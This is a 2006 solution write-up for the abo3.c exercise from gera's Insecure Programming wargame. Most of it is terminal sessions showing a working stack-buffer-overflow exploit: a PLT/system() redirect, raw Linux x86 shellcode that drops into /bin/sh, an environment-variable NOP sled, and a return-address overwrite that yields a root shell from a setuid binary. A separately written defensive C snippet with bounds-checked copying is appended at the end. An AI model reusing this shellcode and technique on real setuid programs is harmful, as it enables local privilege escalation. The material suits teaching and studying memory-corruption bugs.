    /
    | [exp-abo3.txt] Thu Mar 23 14:43:00 CET 2006
    |
    | abo3.c exploit - solution 1
    | http://community.core-sdi.com/~gera/InsecureProgramming/abo3.c
    |
    | Copyright: bunker - http://rawlab.altervista.org
    | 37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2
    \

NB: The "Procedure Linkage Table" exploit (*) doesn't work on my system
    because the "sh" used by system() drops privileges, so I've used the
    classic method here (**), overwriting the return address.

(*) [Procedure Linkage Table exploit]

bunker@syn:~/abo3$ readelf -a abo3 | grep system
080496a4  00000107 R_386_JUMP_SLOT   08048318   system
     1: 08048318   125 FUNC    GLOBAL DEFAULT  UND system@GLIBC_2.0 (2)
   104: 08048318   125 FUNC    GLOBAL DEFAULT  UND system@@GLIBC_2.0

bunker@syn:~/abo3$ ./abo3 `perl -e 'print "\x18\x83\x04\x08"x68;'` "id"
uid=1000(bunker) gid=100(users) groups=17(audio),18(video),19(cdrom),100(users)

(**) [Overwriting return address exploit]

    /
    | Suid abo3 (testing)
    \

bunker@syn:~/abo3$ su
Password:
root@syn:/home/bunker/abo3# chown root.root abo3
root@syn:/home/bunker/abo3# chmod +s abo3
root@syn:/home/bunker/abo3# exit
exit

    /
    | Put bytecode in file "bcode"
    \

bunker@syn:~/abo3$ perl -e 'print "\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"' > bcode

    /
    | Export BCODE env with NOPx100 + bcode
    \

bunker@syn:~/abo3$ export BCODE=`perl -e 'print "\x90"x100'``cat bcode`

    /
    | Find $BCODE address (*see eof for getenvaddr.c)
    \

bunker@syn:~/abo1$ ./getenvaddr BCODE
BCODE is located at 0xbfffff1d

    /
    | Execute abo3, fill the buffer with the $BCODE address
    \

bunker@syn:~/abo3$ ./abo3 `perl -e 'print "\x1d\xff\xff\xbf"x68'`
sh-3.1# id
uid=0(root) gid=100(users) groups=17(audio),18(video),19(cdrom),100(users)

    /
    | Boom! :D
    \

------------------- getenvaddr.c -------------------
#include <stdio.h>
#include <stdlib.h>

/* Print the address at which the value of the environment variable named
 * in argv[1] lives in this process's environment. */
int main(int argc, char *argv[])
{
    char *addr;

    if(argc < 2) {
        printf("usage: %s <var>\n", argv[0]);
        exit(0);
    }

    addr = getenv(argv[1]);
    if(addr == NULL) {
        printf("no env var\n");
        exit(0);
    } else
        printf("%s is located at %p\n", argv[1], addr);

    return 0;
}
------------------- getenvaddr.c -------------------
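As an added defender-side illustration (not code from this write-up or from gera's abo3.c), the defect the return-address overwrite relies on is an unbounded strcpy() of argv[1] into a fixed stack buffer; the hardened variant measures first and refuses input the buffer cannot hold. The 256-byte buffer size and the function names are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 256   /* assumed size of the fixed stack buffer */

/* Vulnerable pattern, shown for contrast only: strcpy() copies until the
 * NUL terminator, so an argument longer than the buffer overwrites whatever
 * follows it on the stack, including the saved return address. */
void fill_unchecked(char *buf, const char *arg)
{
    strcpy(buf, arg);
}

/* Hardened pattern: measure first, copy only if it fits, and report the
 * rejection so the caller can bail out instead of running on garbage.
 * Returns 0 when the copy succeeded, -1 when arg does not fit in dst. */
int fill_checked(char *dst, size_t dstsz, const char *arg)
{
    size_t len = strlen(arg);
    if (len >= dstsz)            /* need room for the terminating NUL */
        return -1;
    memcpy(dst, arg, len + 1);
    return 0;
}

/* Length of the payload used on the page: 68 copies of a 4-byte address,
 * i.e. 272 bytes, which is more than BUF_SIZE. */
size_t page_payload_len(void)
{
    return 68 * 4;
}

int main(int argc, char *argv[])
{
    char buf[BUF_SIZE];
    if (argc < 2) {
        fprintf(stderr, "usage: %s <arg>\n", argv[0]);
        return 1;
    }
    if (fill_checked(buf, sizeof buf, argv[1]) != 0) {
        fprintf(stderr, "argument too long (%zu bytes, max %d)\n",
                strlen(argv[1]), BUF_SIZE - 1);
        return 1;
    }
    printf("copied %zu bytes safely\n", strlen(buf));
    return 0;
}
```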